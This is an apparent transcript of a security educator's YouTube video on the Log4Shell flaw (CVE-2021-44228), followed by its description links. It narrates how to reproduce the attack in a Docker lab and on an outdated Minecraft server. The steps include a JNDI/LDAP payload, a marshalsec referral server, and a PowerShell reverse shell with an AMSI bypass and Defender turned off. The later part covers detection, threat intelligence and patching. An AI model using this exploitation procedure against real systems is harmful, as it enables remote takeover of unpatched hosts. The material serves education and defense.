Three billion devices run java at least according to java and it’s now known the log4 package in java has a vulnerability and can be hacked yes hi if you’re finding this video from the gaming community whether it be minecraft or some link or some reference or some Tweet uh hello my name is john hammond i make cyber security videos here on youtube whether it be malware analysis some dark web dumpster diving programming and capture the flag anything in the sense of cyber security and in this video i want to talk to you about cve 2021 44228 or this java logging package called log 4j that is affecting so so much out on the internet including minecraft so this vulnerability really picked up some steam on december 9th of 2021 and i was kind of tinkering and working throughout the night to explore and Experiment with it so 5 30 in the morning on december 10th 2021 i posted this tweet and it got a little bit of traction and just following that a few hours later i was finally able to get remote code execution and fully take advantage of a minecraft server and i promised I’ll upload a video so in this video i would like to showcase how i put together that exploit that proof of concept i’d like to showcase the other applications and scenarios you might find this vulnerable package in and i want to talk about what the industry is Doing about this i want to talk about some of the detection some of the prevention efforts i want to talk about the different bypasses so both the blue team aspect and the red team aspect and i want to just bring as much information To you as i can now i have a hunch this is going to be a long video so i will do my best to include timestamps in the description so you can click along to different chapters of the sections that you might be most interested in i will Be showcasing the minecraft segment uh probably up front because i think a lot of folks might be really interested in that but please bear in mind minecraft is just the tip of the iceberg and how many software applications and programs that this vulnerability affects this is A zero day and what’s so damning about this is that it’s a cluster bomb of zero days because that log4j package might be in so many other programs and software provided by different vendors and manufacturers and while we you might be able to patch your individual installation or your code base that’s Using this log4j application the vendors that are trickling and pushing their own code downstream you might have to be kind of sitting on your hands waiting for that provider to push their security update so at this point a significant number of companies organizations businesses software providers security vendors are All talking about this twitter is talking about it the whole internet is talking about it different spaces of the world whether you’re in cryptocurrency blockchain nfts this is seriously something that is a hot topic right now we’re all trying to understand hey who is affected what is impacted and because This is baked into some different applications and programs it’s hard to find and detect and know what is in fact vulnerable so the first couple of blog posts that originally came out from this i think around december 9th were lunasec i think lunasec was first to the punch And kind of getting some information out there uh it explains more of the vulnerability in the details uh and i’ve showcased and written that in some of my own blogs which i have linked in the description in fact i will do my best to include just about everything that i Showcase within this video in the links in the description below an original proof of concept and exploit code has already been released and is public out on the internet in fact this github has now been updated since it was originally hosting some other information it now goes into even more detail and showcases Other bypasses and some internal details of how this vulnerability works alongside this there are numerous other repositories and information online as to how you could perform this attack and how you could set this up in a local testing environment if you don’t have software that you already know is Vulnerable just for some super quick show and tell i do want to bring to light uh an example of us using this log4j exploit there are a lot of repositories that will showcase how you can set up your own test environment or simple docker container where you can Explore this vulnerability with lots of other references to other details and information behind it uh this repository does offer a docker container and explain how you can use and abuse this so i’ll go ahead and get clone this and showcase it over here on my terminal let’s move into the temporary directory I’ll go ahead and get clone this here and now i move into this directory uh we can view that readme file and explains how you could build this instance you’ll want to docker build this image and for the sake of showcasing i will go ahead And just do this as root uh so i will go ahead and docker build this system let it work if you don’t have docker installed you can typically do a sudo apt install docker dot io add your user to the group and i’ve showcased that in other videos once that is complete we Can review the readme one more time and get an idea for how to set this up looks like it runs the docker container with removing it after it’s completed mapping ports 8080 to 8080. uh for the sake of me trying to roll with this i’m gonna change that port to something that is Not in use and now i will open another terminal to work with this on the side i’ll move back into that same directory cat the readme one more time to see how we can use this if we wanted to make a curl request with a poison user agent we Could specify the header there with the jndi inject or the syntax that might let us actually see a connection come back uh i’ll go ahead and verify what my docker instance is let me sudo bash one more time and i will ipas docker zero looks like i’m running on 172 11701 so let me go ahead and start up a netcat listener on i suppose port 888 and i will open yet another terminal where i can go ahead and run the curl command that is explained in that readme file you can see hey if you want to make A curl request with the poisoned payload you can set a user agent header now this user agent will need the jndi syntax that uses ldap to make a call back to where your listener is or your attacker controlled server uh and you’ll connect that to okay the target that you Actually want to see here let me go ahead and make that call request i’ll copy and paste this and make those quick changes i’ll bring this up where you could see it now let’s make these changes as we saw from the ipas output the docker instance is running at 172 1701 and i have the netcat listener running currently on quad 8 and we are connecting this to our vulnerable service which is the docker instance running i believe on port 555 as we had set now you could see maybe just barely in the background we did get our Connection and if we actually pivot back over to go see the instance we can see hey we did in fact see a connection with the user agent that would get logged and bring us back make the call back to our attacker controlled instance in this case just my netcat service So now let’s showcase how this can be done in an old and unpatched minecraft server which i’ve been using really as a testbed to showcase the impact and educate users and bring the messaging that this is a sheer insane vulnerability let’s hop over to the computer screen now i’m on the windows Side i’m using windows to go ahead and host the minecraft server also using that as the client to connect to the minecraft server so truthfully this isn’t showcasing the impact for all of the other potential players in a minecraft server but i’m over here on this desktop and i’ve gone ahead and set Up a paper mcu paper minecraft server paper minecraft apparently makes it super duper easy i kind of had to learn and do some quick juggling on the fly how do i actually set this up never done it before so if you wanted to go ahead and download paper you very well could On the hamburger icon here you could go to the downloads button and scroll down to check out some of the information you can notice that paper 1.18 and some others actually have their update and already have patched for the vulnerable incident with log4j if you Wanted to go take a look at some of the legacy packages that are in fact vulnerable if you were trying to recreate this on your own you would be able to see hey you could download some of these other previous ones uh truthfully doesn’t look like it’s Hosting some of the others that it might have seen here because this vulnerability has been so massive i’ll showcase some of the other footage here where i actually had seen the previous releases now they’ve taken them down and off the website in full transparency i ended up setting this up with a old Paper minecrafter paper mc server version 1.88 i was able to track down the downloads for this by just kind of exploring how they structured each of their download directories and i had ended up finding that given a version and build number you could search for that download specifically if i move Into this downloads directory let me see oh it doesn’t actually display any directory indexing that’s okay can i get specifically the version that i had downloaded previously and i made sure to save this link this is 188 build 443 let’s see if it is still being served And hosted and no it has currently been taken offline that’s a good thing now there won’t be as many vulnerable minecraft servers out there on the internet this paper minecraft server and minecraft all in general does require java and i wanted to again go for an old School version of java where i know this would be vulnerable because i just wanted to showcase this exploit and get it to work so i ended up finding some repositories where i could go ahead and download this online and in fact when i was still wanting to work with java 8 i Ended up finding that portableapps.com did in fact showcase and host some of these older versions i wanted java 8 1 8 1 which i could find for my 64-bit version of windows here upon downloading that i was able to go ahead and set things up and i moved the installation Of paper here onto my desktop and just a folder here where you can see that specific version number 18443 alongside it i set up a start paper batch script which if we just wanted to take a look at all it simply does is it runs java which is the version that i Just downloaded 180 181 running this jar file and let me show that to you super quick i do have it in my path so i can run java attack version and that is the version that i’m working with you’ll notice my username is santa i’m super sorry uh i know this is Supposed to be a cool professional learning video but this is the virtual machine that i had used to prepare the try hack me advent of cyber learning challenge so fun easter egg for current viewers that i have if you’re new to the channel uh go check out that video so With that i could move into my desktop and i could run that start paper dot batch script this will go ahead and start up the minecraft server if you haven’t done this before it does require you to agree to the end user license agreement which is simple All we need to do is open this file and change ula to true nice and easy and now let’s restart that again so at this point the minecraft server is running i’ll drag this over to the side here and i’ll go ahead and get started with my minecraft launcher now when i Bring this up i am running the java edition of minecraft and you can actually see hey there is some messaging and notification about the security vulnerability in this edition if you want to go check out that page minecraft explains and tells you a little bit more About it and this in fact tells you what you need to do to try and remediate or mitigate against this vulnerability it does explain that the latest versions 1.18 as you’ve seen that number around is in fact patched and secure if we actually go take a look at the Installations you might be able to see the patch notes even here and this minecraft java edition 1.81 explains that this release fixes a critical security issue for multiple servers and that client version is patch so upgrade minecraft if that’s what you’re using now again for the sake of showcasing i Had gone into installations and i had clicked on new installation to go find myself a different version or old school rendition of minecraft and in fact i had been using that 1.8 way down below 1.88 now this explains that 1.88 is an older version that doesn’t support the latest player safety features totally Understood however i want to just explore this vulnerability if i go ahead and hit play here this will go ahead and start up minecraft for me and i’ll resize the window to make this a bit more visible so i’ll move into multiplayer so i have set up this minecraft server which is One that i simply added being the local ip address of this computer if you aren’t sure how to get that you can simply open up the command prompt and ipconfig will show you hey your current ip address now i’ll go ahead and connect to this minecraft server but I’ll bring this window to the other side so we can kind of see these side by side of course we’ll go ahead and log in and we can see that hey my user has connected and here i am being a minecraft youtuber my mouse sensitivity is like super crazy i don’t understand This so the danger in this minecraft game is that if i were to enter into the chat anything that i really wanted to send to other players this is where the injection point is so now that we’ve set up the vulnerable minecraft server and the victim client Let’s go figure out how the attacking machine is set up i am going to move out of this virtual machine bring this over to the side here and i do have a kali linux instance which is where i’ll be showcasing how we could do this so if You haven’t seen it from any of the descriptions or anything that i’ve been showcasing thus far the way that this payload executes is by a jndi or the java naming and directory interface syntax it makes a call out to an ldap server which will then be configured With a referrer to send it back to an http server which will then execute and work with more code thus the victim will then execute arbitrary code hosted by a hacker or bad threat actor so if we are trying to recreate this locally we need something to be able to actually host This ldap referrer server for us now from the research that i had done thus far this can be done with this marshall sac utility which is some great research done by other individuals showcasing this jndi injection technique looks like they have actually updated their readme here to explain hey if you’re looking For information on the cve for log shell this is what you could understand and learn more about it scrolling down we can see the usage here to explain how to build and put this all together it does note java 8 is required in which case i had gone and tracked down the again Older version of java and jdk so that i could be able to recreate this notice i’m trying to use java 8 all across the board between the windows victim and the kali linux attacking machine i will open up another terminal window and i’ll show you the java version that i’m currently running is 1.80181 the same rendition on the windows machine i had downloaded this from this mirror root pai in their jdk listing grabbing that specific version number but if you went to this page you would get a secure connection issue in which case you can just visit this With http instead and there we go this is a good listing of those different version numbers you might want again i’m working with java 8u181 and you can download that tar gzip file extract and run this as needed now going back to set up and work with this Marshall sec utility let’s get back to our terminal and i’ll just make a temporary directory for me to work with in here i’ll go ahead and git clone this repository move into that directory and it said for the installation process you will need maven uh m-a-v-e-n which again you can Sudo apt-install if you do not yet have it go ahead and run that command and it will go ahead and build this package for us in the targets folder as a reminder this marshall sec utility sets up our ldap referrer it’s not our payload but It sets it up so that we could then send a malicious payload what we had seen previously when we did that docker connection we had just ran with a netcat listener and let me view my ip address to be able to showcase this uh we have 100166 Let me start up a netcat listener on 999 i suppose and i’ll bring this window over to the side where over in my minecraft instance i could go ahead and run that malicious command looks like i see it’s night time so let me go ahead And try and type in the syntax here i will use that dollar sign prefix in front of the curly braces and it’s jndi colon ldap colon slash the ip address that we want to connect to which is that ldap listener right so if i were to try And go to this ip address uh given the port looks like i forgot the port there so i need colon 999. will see the connection come back if i actually take a look at the logs of the server you’ll notice the original prefix didn’t have those 999 port number There but the other one did and that’s not being displayed here we can see some damage potentially starting to be done with this right but that is the starting step now we need to actually set up this referral server to host malicious code so let me hop back to this cali virtual Machine i’ll stop this netcat listener and review the syntax to run this now there are a lot of examples showcasing how to do this if you were to simply just search on github for log4j let me look for specific repositories throughout all of github there will be a Lot of potential proof of concepts the original one that we saw and others this one specifically zha zhan 325 was telling me a little bit more of how to actually set this up you’ll notice that you will need to host your own http server with code that you can compile And have it do whatever you’d like and then use this marshall sex service with the syntax to go ahead and run the jndi ldap referral server telling it what you want it to send it to with a specific class name or java code that you would then like to execute So let’s go ahead and grab the syntax move it back to our terminal and run this code here i want this to call back to my ip address which we saw from the ip address that i am 10 1 6 6 as the last octet and we’ll go ahead And host a server on 8 000. and there we go we’ll set this up and you can see it is running an ldap server locally or on all interfaces on port 1389 now we would want to prepare our http server hosting java code that will then be executed on the target So let me open another terminal here and i’ll move back a directory and i’ll show you how they kind of explain this in that repository here you can see there’s a java folder that indicates hey you have the source code for log4j rce being the proof of concept or exploit that You’d like to run and then this showcases some example vulnerable code and how it might actually work using the log 4j logger it sets up any boilerplate things necessary and then eventually if it tries to log some information specifically this payload syntax right now it will reach out and Then execute it because of our ldap referral server so let me show you this code that they’re using they just use a simple public class with the class name that matches the file a static method and a specific function for it interestingly enough they also include the syntax that might Execute arbitrary commands or do some damage that you would really want to do so let’s try and again hippity-hoppity your code is now my property slap that in here let’s go ahead and create a poc directory i will go ahead and mousepad a log4jrce.java and then i’ll slap this in To this text editor here saving this file so we get our syntax highlighting we could have this display whatever we’d like but truthfully i want to clean this up and have it execute a command to demonstrate our proof of concept work here and clean this up just a smidge I’ll remove that line and the javalang nonsense so we’ll just run the runtime exec command and we can pass in a string that we might want to run i’ll go ahead and start with a simple payload for calc.exe now with that complete we can go ahead and compile the specific java syntax I’ll use java c and go ahead and compile our log4jrce if i ls in my current directory we can see that that class file has been created and now we want to be able to publicly host this on a port that we’ll have our server call back to so i’ll go Back to that other intermediary terminal here move some things around so this is easy to see and i’ll go ahead in python 3 http server so i am hosting a simple http server at the moment with that we now have everything set up so i’ll move out of this kali linux instance while The listener for ldap in the referral server is waiting to send it back to this 8000 port we can then see how this looks from the minecraft point of view i’ll drag this over switch back to minecraft and run the same command but now use something specific or i’ll go to 100166 But now we’re listening on port 1389 specifically for ldap and we know that we want to run that log4j rce so now when i hit enter on this look carefully at the left-hand side of the screen where kali linux and our attacker machine is running we’ll see the Connection come with the very top window from ldap then we’ll see it come down to our http server and we should see the calculator application pop up on the windows victim so i just tested it one more time to ensure that it works and i wanted to Make sure you’d be able to actually visually see the impact but my face was in the way in the video so i want to drag the camera up so let me run the exact same command and look carefully i’ll hit enter and there you can see we saw the Connection come through from ldap we see the http request and down at the very very bottom of this windows machine you can see that the calculator application has been started even twice because it made two requests there and with that we have proven remote code execution on the victim Through minecraft we just hacked minecraft but obviously i’m using a very simple benign innocent payload of just opening the calculator application this grants an attacker the ability to do whatever they want they could start up a cryptocurrency miner they could begin a remote access trojan maybe a cobalt Strike beacon they could drop ransomware it’s really whatever they’d like so for another proof of concept let’s actually get a shell on this machine using minecraft in this jndi log4j exploit for the sake of demonstration i’m going to make sure that windows defender is off uh you should absolutely ensure that Windows defender is on you should be really using a solid anti-virus so i’m clicking in here and verifying that in managed threat detection let’s turn real time protection off there we go and now in our attacker machine let’s go ahead and google for a power shell reverse shell syntax uh and we could Really grab any of these let me just grab a one-liner uh payload’s all the thing has some great ones but this one should work just as easily for us i am going to try to rip this and i am going to want to power shell and code this uh base 64. i think There’s like a rye raiku this thing i want to be able to base64 encode this so it’s a quick and easy sample uh this will however need to be bypassing amsi or the anti-malware scan interface so just for the sake of showcasing again i’ll go to amsi dot fail flang vix tool That does incredible stuff let’s grab a roster mouse bypass asi msi scan buffer patch syntax it’s just showcasing c sharp and i believe that will be fine with new lines but i’m not quite sure so let’s go ahead and find out uh we will want to modify our reverse shell syntax to Actually call back to our attacker machine right so let’s use 10 0 0 166 yet again um and then let’s use a different port this time i suppose um nine eight nine eight now let’s go ahead and encode this there we go and i have all of this giant Disgusting powershell syntax but let’s go modify our exploit code and see this in action i’m going to use mousepad yet again to modify our log for jrce javascript and then replace where we were originally just running calc.exe let’s go ahead and slap all of this in And let’s just see if this works i’m not a thousand percent confident but let’s try to use java c to compile this yet again um and now that that’s been done we can start up a netcat listener on port 9898 let’s move our kali linux instance over To the left-hand side of the screen let’s go back to the game and try and run the same thing again where we see the connection and we do have a connection in netcat so if i were to bring that up super quick let me try and Run the who am i command just to verify we are on the box and yes i am santa running on the desktop of that victim windows computer and now i could do anything i could i could do privilege escalation i could do lateral movement i could add persistence I could be a threat actor and do any portion of the attack kill chain the cyber kill chain and do some later damage so that is that vulnerability showcased within minecraft but there is so much more to this minecraft is just one small piece of this cluster bomb of A zero day now i only want to show you this in the context of old deprecated legacy unpatched minecraft minecraft has itself patched for paper server versions the latest rendition for the minecraft client etc and i wanted to just raise awareness with how this might affect the gaming Community to keep those players safe you should be running antivirus so those threats don’t come through you should be updating you should be patching you know the drill so now i’ve shown you the red team perspective from the adversary at least in the case of minecraft but let’s talk about the Greater repercussions and how the industry is responding to this for blue teaming and defense and protection and detection what i had showcased in those simple proof-of-concept examples in the docker container or within minecraft were just a flat vanilla basic syntax however there are now being lots of different Bypasses or attempts to kind of obfuscate it or hide it so it’s not easily detected or is trapped and not stopped by web application filters and we are seeing lots of active in the wild exploitation of this this doesn’t really have any specific target it’s not targeted right anyone could just Spray and pray across the internet some of the great folks over at gray noise are in fact seeing hey active exploitation from different actors and different ip addresses in fact they’ve created a tag to be able to categorize and determine hey okay if we want to do some better research and actually get Some specific host names and ip addresses that defenders could use to block at the edge or just have the threat intelligence that is now all public and out and about they’ve shared some great gists or again snippets of code and text and information out on github if you have any interest again These links will be in the description but you can see about a hundred at first now about 150 i don’t believe this link has been updated just yet but those specific ip addresses and then what in fact is the syntax that they’re using or what payload are they actually firing back We could actually use this to maybe potentially examine what payload is being used if you could still find this online reach back out to it pull down the payload and commands detonated but look at this significant number a couple of the really interesting ones are in fact using one well-known and kind of Easily off-the-shelf accessible github repository that just shows how to do this jndi exploit with the command base64 included in the url that one’s actually worthwhile and really interesting because the base64 code itself like the command that’s being run is present and you can find that within logs there are other great tweets other Great individuals showcasing kind of again acting as a megaphone to amplify this information how you could track it down know what’s required for this attack to be pulled off how you can mitigate it etc another researcher florian roth has started to create again more detection efforts and his own utility a python Script that might help you look for this sort of activity all the malicious indicators inside of your own logs if you’re working with the server that could very well be vulnerable to this use this take advantage of it explore it if you feel like you need to go do this Fire fighting within your own organization these are some great resources and it truly shows the community coming together here at the moment the real threats and the payloads that we’re seeing included in this active in the wild exploitation have so far just been cryptocurrency miners and botnets now that’s not to belittle or And trivialize those but we aren’t currently seeing remote access trojans or cobalt strike beacons ransomware this could very well be further down the line with more days of exploitation some ransomware armageddon additionally there is some chatter out on the twitter verse that this attack vector this jndi injection technique has been Known and publicized and talked about in fact there was a presentation back at black hat usa in 2016 all about this sort of attack and what could be done from it and it says right there if we dive into it applications should not perform jndi lookups with untrusted data or user input Now there are a lot of people very upset that if there is this five-year-old attack vector this vulnerability that we could have known about and there is even some chatter looking back at like the reports and bug fixes and pull requests for this project bringing in this feature quote-unquote Now becomes this bug and potential vulnerability a lot of people are not all that happy now with that said there is no shade or hate or any bad mouthing towards those developers this is not a reflection of them uh it’s not they do this work volunteer right this is a Project this is a labor of love this is a passion that they enjoy and we should not by any means be offering any discomfort or malice towards them this is just the world that we’re in right now and what could come from this vulnerability now in case some of you Might be saying hey john it’s been a day you know december 10th is kind of when you got this thing popped on minecraft december 11th is when you’re recording and releasing this video what the heck have you been up to well i have been trying to fight fires here right you Know be in the trenches raise the awareness keep pushing the education get the threat intelligence out there talk to folks reassure them if need be help determine what is vulnerable and what isn’t vulnerable and a lot of that can be reflected in the blog that i had Written through my own day job and employer huntress hopefully that offers a little bit more insight on kind of what we’ve been up to and uh how we can help one thing that we are very very pleased with and i’m very proud we were able to get across the finish line is That there is now a free open and accessible utility open source you can find the source code on github that i will showcase a log4j shell tester so if you don’t know what application might be vulnerable to this or is using the log4j package somewhere in its internals you Can slap in a payload like the same syntax the jndi and ldap code that i was using in minecraft as the user agent in that simple docker image proof of concept and you can test like the best verification of the validation that you could get does it make a connection does It call back to something remotely there is no code that executes on your machine nothing is like deployed or detonated on the target on the victim it’s simply doing a lookup and doing a quick check and connection hey do we actually see the vulnerability here and the source Code is available on github if you for some reason hey don’t trust us you want to review it and make sure that it’s doing nothing other than making that connection that is available for you for another quick show and tell let me showcase how you can actually use that Huntress log for shell vulnerability tester let me spin up that docker testing environment one more time and i’ll go ahead and actually try to exploit this with the payload that is generated and given here so i’m going to open up a yet another terminal so i will Go ahead and select this payload and then i will go ahead and run that curl command as we saw previously using a specific user agent that allows us to just pass this in we’ll slap it and paste that payload and again we want this to connect to currently listening Localhost for my testbed on port quad 5. now when i hit enter we should see that there was some connections down below and that has logged so if i go view the connections given our huntress log shell tester here we will see that oh there’s my ip Address there is the connection time and i could use this to verify that application that i was using was in fact vulnerable i hope this helps people across the industry because the hardest thing about this vulnerability is that it could be baked in to so many different programs and applications and We just don’t know unless we were to try and test this like you could look for hey files that might be named log4j but that has both false positives and false negatives because you might not know the version number or you might not know if it’s actually in use between some Portion of the application so hopefully having this to send a benign payload and just be able to test and see the connection will give you a sanity check yes no something a little bit better than just blindly guessing and hey just as a reminder uh this is just copy and Paste you don’t need to have the technical chops to be using curl you don’t need to be setting user agent you literally just need that syntax and slap it into anything that you see put it into input forms put it into user logins put into things that you just might Access any page with or something that could very well be logged in any application it’s just a matter of copying and pasting and trying it okay i think it’s time i try to wind this video down um it’s been a long video and i know there’s a lot of info i’m Showcasing a lot of stuff but i want to show just how much you could see you could learn you could explore if you went out and looked around if you stayed up to date with your vendors your software suppliers the providers that you work and integrate with uh and check To see hey is the application that i might be using vulnerable with hopefully some of the tools accessible with the information that you now know and hold them accountable right like we this this takes a village this takes everyone playing in concert and i hope that’s been some incredible thing for you to See is this absolute outpouring of everyone in the industry on twitter in different facets of the world that we live in uh rising together to tackle this thing because it’s big and bad and not to be fear-mongering not to be hey fear uncertainty and doubt but honestly uh we’re doing everything That we can you know we’ve been working some sleeplessless nights i know that you have probably listening and watching this you just as well but we are just at the front of it and i have to think we might see this vulnerability for years to come because there might be software That just won’t update and push this maybe it’s dead or deprecated or legacy code this very well is like another shell shock like vulnerability in its sheer scale and we’ll see it from now on so my lasting thoughts right as we start to tune this video out thanks for Sticking with it to the end uh hey i hope you learned something i hope this showcase something cool something interesting uh and helps you get you more in the know as to what is going on and if you’re an organization fighting fires in the trenches you need this help Hopefully you have some other resources that can better help you lots of links in the description hopefully time stamps just as well thank you so so much for watching this i hope that it offers you something new and if you’re coming from the gaming community if you’re over There one of those minecraft fellows to check this video out please stay please stick around take a look at the channel and see what other new things you could learn because you are working on a computer you are playing with technology and software and security and that’s not Something that you can just kind of set and forget or put over in the corner or put your feet up on the dash and wait for incidents to happen you have to earn security you have to fight for it every single day so thanks so much i’ll get Off my soapbox it’s been fun everybody i hope you learned something i love you and i’ll see in the next video Video Information
This video, titled ‘CVE-2021-44228 – Log4j – MINECRAFT VULNERABLE! (and SO MUCH MORE)’, was uploaded by John Hammond on 2021-12-11 23:30:08. It has garnered 328167 views and 12936 likes. The duration of the video is 00:34:52 or 2092 seconds.
Timestamps (HUGE thanks to deetee in the comments for putting these together!!!):
Detection: https://twitter.com/thinkstcanary/status/1469439743905697797?s=21 https://twitter.com/an0maious/status/1469350532548632581 https://twitter.com/an0n_r0/status/1469643986403008515 Threats: https://twitter.com/zom3y3/status/1469508032887414784 Bypasses: https://twitter.com/Rezn0k/status/1469523006015750146
For more content, subscribe on Twitch! https://twitch.tv/johnhammond010 If you would like to support me, please like, comment & subscribe, and check me out on Patreon: https://patreon.com/johnhammond010 PayPal: https://paypal.me/johnhammond010 E-mail: [email protected] Discord: https://johnhammond.org/discord Twitter: https://twitter.com/_johnhammond GitHub: https://github.com/JohnHammond
If you would like to support the channel and I, check out Kite! Kite is a coding assistant that helps you code faster, on any IDE offer smart completions and documentation. https://www.kite.com/get-kite/?utm_medium=referral&utm_source=youtube&utm_campaign=johnhammond&utm_content=description-only (disclaimer, affiliate link)
